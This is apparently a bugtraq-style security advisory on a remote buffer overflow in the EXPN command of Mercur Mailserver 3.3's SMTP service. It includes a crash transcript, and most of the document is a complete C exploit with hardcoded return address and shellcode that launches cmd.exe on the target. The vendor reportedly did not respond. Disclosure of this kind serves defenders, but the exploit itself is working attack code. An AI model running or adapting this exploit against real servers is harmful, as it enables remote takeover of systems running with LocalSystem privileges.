COMMAND

    Mercur

SYSTEMS AFFECTED

    Mercur Mailserver 3.3

PROBLEM

    Martin NA found  following.  By  default SMTP server  is installed
    to be run from  LocalSystem account.  This  makes it easy to  make
    any action on the target system if an attacker could gain  control
    over the code execution flow of the product.

    Particulary,  MERCUR  SMTP-Service  (binary  MCRSMTP.EXE   version
    3.30.3.0) suffers from buffer overflow illustrated below:

        220 MERCUR SMTP-Server (v3.30.03 Unregistered)
        for Windows NT ready at Thu, 15 Feb 2001  03:55:34 -0800
        EXPN AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        
        
        Connection to host lost.
        
        C:\>

    Submission of string which  contains address the processor  should
    jump to  at position  133,134,135 and  136 will  gain full control
    over the machine...

    Here is exploit that runs an instance of cmd.exe on target host:

    /*
     MERCUR Mailserver 3.3 Remote Buffer Overflow
     Tested on Win2K AS SP1 with MERCUR SMTP-Server v3.30.03
     Martin Rakhmanoff
     martin@direct.spb.ru
    */
    
    #include <winsock2.h>
    #include <stdio.h>
    
    /* \x63\x6D\x64\x2E\x65\x78\x65 - simply 'cmd.exe' */
    char shellcode[] =
     "\x8B\xC4\x83\xC0\x17\x50\xB8\x0E\xB5\xE9\x77\xFF\xD0\x33\xDB\x53"
     "\xB8\x2D\xF3\xE8\x77\xFF\xD0\x63\x6D\x64\x2E\x65\x78\x65\x0D\x0A";
    /*
    In SoftICE bpx 001b:00418b65 - here eip is restored
    with overwritten
    value...
    */
    
    int main(int argc, char * argv[]){
    
     int i;
     char sploit[512];
     char buffer[512];
    
     WSADATA wsaData;
     SOCKET  sock;
     struct sockaddr_in server;
     struct hostent *hp;
    
     WSAStartup(0x202,&wsaData);
     hp = gethostbyname("arena");
     memset(&server,0,sizeof(server));
     memcpy(&(server.sin_addr),hp->h_addr,hp->h_length);
     server.sin_family = hp->h_addrtype;
     server.sin_port = htons(25);
     sock = socket(AF_INET,SOCK_STREAM,0);
     connect(sock,(struct sockaddr*)&server,sizeof(server));
    
     sploit[0]='E';
     sploit[1]='X';
     sploit[2]='P';
     sploit[3]='N';
     sploit[4]=0x20;
    
    
     for(i=5;i<137;i++){
      sploit[i]=0x41;
     }
    
     // Return address
     //77E87D8B
    
     sploit[137]=0x8B;
     sploit[138]=0x89;
     sploit[139]=0xE8;
     sploit[140]=0x77;
    
     for(i=0;i<sizeof(shellcode);i++){
      sploit[i+141]=shellcode[i];
     }
    
     recv(sock,buffer,512,0);
    
     send(sock,sploit,173,0);
    
     closesocket(sock);
     WSACleanup();
    
     return 0;
    }

SOLUTION

    Vendor was notified but no action was done...